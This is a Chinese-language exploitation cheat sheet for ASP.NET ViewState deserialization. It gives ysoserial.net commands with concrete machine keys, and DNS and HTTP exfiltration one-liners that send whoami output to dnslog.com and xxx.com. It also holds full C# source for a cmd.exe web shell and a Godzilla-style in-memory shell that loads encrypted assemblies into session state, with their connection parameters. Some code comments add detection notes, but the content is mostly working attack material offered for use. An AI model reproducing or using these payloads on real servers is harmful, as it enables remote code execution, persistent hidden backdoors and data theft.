C-Sharp ViewState Deserialization

.Net 之殇 ViewState 反序列化

ViewState 利用简记

检测:

  1. AspDotNetWrapper

    #对应修改 --encrypteddata 为 __VIEWSTATE 的值，--modifier 为 __VIEWSTATEGENERATOR 的值
    AspDotNetWrapper.exe --keypath MachineKeys.txt --encrypteddata /wEPDwULLTIxMzM5NTgzMTIPZBYCAgMPZBYCAgcPFgQeBWNsYXNzBSRhbGVydCBhbGVydC1kYW5nZXIgYWxlcnQtZGlzbWlzc2libGUeB1Zpc2libGVoFgICAQ8PFgIeBFRleHRlZGRkMixFMklGXEdmkdXJ2/H8ZhUck/M= --decrypt --purpose=viewstate --modifier=C2EE9ABB --macdecode


利用:

  1. Ysoserial.net

    #按目标修改 --generator 与 --validationkey
    ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll" --generator=C2EE9ABB --validationalg="SHA1" --validationkey="2EEA416CEFC6D6BE856ED57B97FB9CA7DFACE17C073125949A1D682C80A44BB2AD887DDDC13DBFB0954F1000FEE5757E99693F222F8E28CAA2E6DAB8C4F99E0C"

  2. Poc

    如果目标可以出网，Windows 下可通过 dnslog 外带命令执行结果

    ysoserial.exe -p ViewState -g TypeConfuseDelegate -c "for /F ""delims=\ tokens=2"" %i in ('whoami') do ping -n 1 %i.n2tmg3.dnslog.com" --path="/Login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="8A3AD1DD400FF3A09F3F5CB27C0411D2E8C7792CE523FD7B" --validationalg="SHA1" --validationkey="52B3217F9A9F7B8CE24DEFBD3EDF2B698E37B2ADE33257FAD329A242C11579D0EEDDB67F94CCF27143DCA4BBF9667DDAE78EBEDDD9EABB7C7AB874B5EC443954" --generator=C2EE9ABB
    for /F "delims=\ tokens=2" %i in ('whoami') do ping -n 1 %i.xxx.com
    for /F %X in ('whoami') do powershell $a=[System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes('%X'));$b=New-Object System.Net.WebClient;$b.DownloadString('xxx.com/api/get?'+$a);

  3. 内存马

    命令执行

    // Command-execution class carried by the ViewState payload. All behaviour lives in the
    // constructor, so it runs as soon as the class is instantiated (presumably by the
    // deserialization gadget chain named in the ysoserial invocation below — confirm against the chain).
    // Defender notes: the observable artifacts are the ASP.NET worker process (typically w3wp.exe)
    // spawning cmd.exe with "/c <value of the cmd form field>", and a POST carrying a "cmd"
    // parameter whose stdout is echoed back verbatim in the response body.
    class E
    {
    // Constructor: runs the "cmd" form field through cmd.exe and returns its stdout as the response.
    public E()
    {
    // Take over the current request; ClearError() drops any pending pipeline exception
    // (likely the deserialization error itself — TODO confirm) so no error page is rendered.
    System.Web.HttpContext context = System.Web.HttpContext.Current;
    context.Server.ClearError();
    // Discard whatever the page already buffered so only the command output is returned.
    context.Response.Clear();
    try
    {
    System.Diagnostics.Process process = new System.Diagnostics.Process();
    process.StartInfo.FileName = "cmd.exe";
    // Untrusted request input is passed straight to cmd.exe; this parameter name and the
    // "/c " prefix are what request-log review or a WAF/IDS rule can key on.
    string cmd = context.Request.Form["cmd"];
    process.StartInfo.Arguments = "/c " + cmd;
    process.StartInfo.RedirectStandardOutput = true;
    // stderr is redirected but never read, so only stdout reaches the response.
    process.StartInfo.RedirectStandardError = true;
    // UseShellExecute must be false for stream redirection; no credentials are supplied,
    // so the child inherits the identity of the hosting worker process.
    process.StartInfo.UseShellExecute = false;
    process.Start();
    string output = process.StandardOutput.ReadToEnd();
    context.Response.Write(output);
    // Every failure is swallowed: the shell stays silent rather than surfacing an error page.
    } catch (System.Exception) {}
    // Flush and terminate the pipeline so no further page rendering is appended to the output.
    context.Response.Flush();
    context.Response.End();
    }
    }
    ysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile -c "ExploitClass.cs;./dlls/System.dll;./dlls/System.Web.dll" --path="/Login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="8A3AD1DD400FF3A09F3F5CB27C0411D2E8C7792CE523FD7B" --validationalg="SHA1" --validationkey="52B3217F9A9F7B8CE24DEFBD3EDF2B698E37B2ADE33257FAD329A242C11579D0EEDDB67F94CCF27143DCA4BBF9667DDAE78EBEDDD9EABB7C7AB874B5EC443954" --generator=C2EE9ABB 

    哥斯拉

    // Godzilla-style in-memory shell. The first request delivers an encrypted .NET assembly that
    // is loaded from bytes via reflection and cached in session state; later requests dispatch
    // into that cached assembly. Nothing is written to disk, so file-based scanning is likely to
    // miss it; session-state inspection and traffic patterns are the practical detection points.
    // Defender notes: on the wire this is a request parameter named "pas" carrying base64 AES
    // data, and a response framed as md5[0..16] + base64 ciphertext + md5[16..] (see the writes below).
    class E
    {
    // Constructor: all logic runs on instantiation; the request/response are taken over directly.
    public E()
    {
    // ClearError() drops any pending pipeline exception (presumably the deserialization error —
    // TODO confirm); Clear() discards the page's buffered output.
    System.Web.HttpContext Context = System.Web.HttpContext.Current;
    Context.Server.ClearError();
    Context.Response.Clear();
    try
    {
    // Hard-coded shared secret (used as both AES key and IV below) and the request parameter name.
    string key = "3c6e0b8a9c15224a";
    string pass = "pas";
    // Hex MD5 of pass+key with dashes removed; its two halves bracket the response body.
    string md5 = System.BitConverter.ToString(new System.Security.Cryptography.MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.Default.GetBytes(pass + key))).Replace("-", "");
    // Request body: base64-decode the "pas" parameter, then AES-decrypt it with the same
    // 16 key bytes supplied as both key and IV (RijndaelManaged default mode otherwise).
    byte[] data = System.Convert.FromBase64String(Context.Request[pass]);
    data = new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(data, 0, data.Length);
    // First call: the plaintext is an assembly image. It is loaded from memory through
    // Assembly.Load(byte[]) invoked via GetMethod/Invoke rather than a direct call (an
    // indirection that hides the API name from simple string scans) and cached in the session
    // under "payload" so subsequent requests can reach it.
    if (Context.Session["payload"] == null)
    {
    Context.Session["payload"] = (System.Reflection.Assembly)typeof(System.Reflection.Assembly).GetMethod("Load", new System.Type[] { typeof(byte[]) }).Invoke(null, new object[] { data });
    }
    else
    {
    // Later calls: instantiate type "LY" from the cached assembly and hand it the context, an
    // output stream and the decrypted data through Equals(), then trigger it with ToString() —
    // presumably those members are overridden in the loaded assembly to act as the dispatch
    // protocol; that assembly is not visible here.
    System.IO.MemoryStream outStream = new System.IO.MemoryStream();
    object o = ((System.Reflection.Assembly)Context.Session["payload"]).CreateInstance("LY");
    o.Equals(Context); o.Equals(outStream); o.Equals(data); o.ToString();
    byte[] r = outStream.ToArray();
    // Response framing: md5 prefix, AES-encrypted result as base64, md5 suffix.
    Context.Response.Write(md5.Substring(0, 16));
    Context.Response.Write(System.Convert.ToBase64String(new System.Security.Cryptography.RijndaelManaged().CreateEncryptor(System.Text.Encoding.Default.GetBytes(key), System.Text.Encoding.Default.GetBytes(key)).TransformFinalBlock(r, 0, r.Length))); Context.Response.Write(md5.Substring(16));
    }
    }
    // Errors are swallowed: a failed request returns an empty body instead of an error page.
    catch (System.Exception) { }
    // Flush and terminate the pipeline so nothing else is appended to the framed output.
    Context.Response.Flush();
    Context.Response.End();
    }
    }

    连接方式

    pas
    key


    left data
    __VIEWSTATE=<yso生成的内容>&__VIEWSTATEGENERATOR=60AF4XXX&

    .NET 高版本：DisableTypeCheck

    ysoserial.exe -p ViewState -g ActivitySurrogateDisableTypeCheck -c "ignore" --path="/Login.aspx" --apppath="/" --decryptionalg="AES" --decryptionkey="8A3AD1DD400FF3A09F3F5CB27C0411D2E8C7792CE523FD7B" --validationalg="SHA1" --validationkey="52B3217F9A9F7B8CE24DEFBD3EDF2B698E37B2ADE33257FAD329A242C11579D0EEDDB67F94CCF27143DCA4BBF9667DDAE78EBEDDD9EABB7C7AB874B5EC443954" --generator=C2EE9ABB